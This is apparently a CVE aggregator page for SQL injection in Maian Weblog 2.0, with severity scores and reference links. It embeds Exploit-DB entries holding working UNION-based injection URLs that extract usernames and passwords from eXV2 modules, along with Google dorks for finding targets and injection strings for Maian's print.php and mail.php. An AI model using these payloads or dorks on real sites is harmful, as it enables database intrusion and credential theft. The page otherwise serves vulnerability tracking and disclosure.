CVE-2006-1334
published 2006-03-21CVE-2006-1334: Multiple SQL injection vulnerabilities in Maian Weblog 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) entry and (2) email parameters…
PriorityP335medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.30%
81.2th percentile
Multiple SQL injection vulnerabilities in Maian Weblog 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) entry and (2) email parameters to (a) print.php and (b) mail.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maian_script_world | maian_weblog | <= 2.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
Exploit-DB
eXV2 Module MyAnnonces - 'lid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1406 eXV2 Module MyAnnonces - 'lid' SQL Injection
eXV2 Module MyAnnonces - 'lid' SQL Injection
---
##########################################
#
# Powered by eXV2 MyAnnonces 1.8 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORK 1 : eXV2 MyAnnonces
#
###########################################
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3a,1/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
Category: eXV2 - Module
myannonces 1.8
Submit date; 2006/4/10
Version : 1.8
###########################################
################
Exploit-DB
Maian Weblog 2.0 - 'mail.php' SQL Injection
exploitdb·2006-03-27
CVE-2006-1334 Maian Weblog 2.0 - 'mail.php' SQL Injection
Maian Weblog 2.0 - 'mail.php' SQL Injection
---
source: https://www.securityfocus.com/bid/17247/info
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
http://www.example.com/mail.php? cmd=remove&email=111' or 1/*
Exploit-DB
Maian Weblog 2.0 - 'print.php' SQL Injection
exploitdb·2006-03-27
CVE-2006-1334 Maian Weblog 2.0 - 'print.php' SQL Injection
Maian Weblog 2.0 - 'print.php' SQL Injection
---
source: https://www.securityfocus.com/bid/17247/info
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
http://www.example.com/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*
No writeups or analysis indexed.
http://evuln.com/vulns/101/summary.htmlhttp://secunia.com/advisories/19273http://securityreason.com/securityalert/638http://securitytracker.com/id?1015818http://www.osvdb.org/23945http://www.osvdb.org/23946http://www.securityfocus.com/archive/1/428903/100/0/threadedhttp://www.securityfocus.com/bid/17159http://www.securityfocus.com/bid/17247http://www.vupen.com/english/advisories/2006/0994https://exchange.xforce.ibmcloud.com/vulnerabilities/25295http://evuln.com/vulns/101/summary.htmlhttp://secunia.com/advisories/19273http://securityreason.com/securityalert/638http://securitytracker.com/id?1015818http://www.osvdb.org/23945http://www.osvdb.org/23946http://www.securityfocus.com/archive/1/428903/100/0/threadedhttp://www.securityfocus.com/bid/17159http://www.securityfocus.com/bid/17247http://www.vupen.com/english/advisories/2006/0994https://exchange.xforce.ibmcloud.com/vulnerabilities/25295
2006-03-21
Published